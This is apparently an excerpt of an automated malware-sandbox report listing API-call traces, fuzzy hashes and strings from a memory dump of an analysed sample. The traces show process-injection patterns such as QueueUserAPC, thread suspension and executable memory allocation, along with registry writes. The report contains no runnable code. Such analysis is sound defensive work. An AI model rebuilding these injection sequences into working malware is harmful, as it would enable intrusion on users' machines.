  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
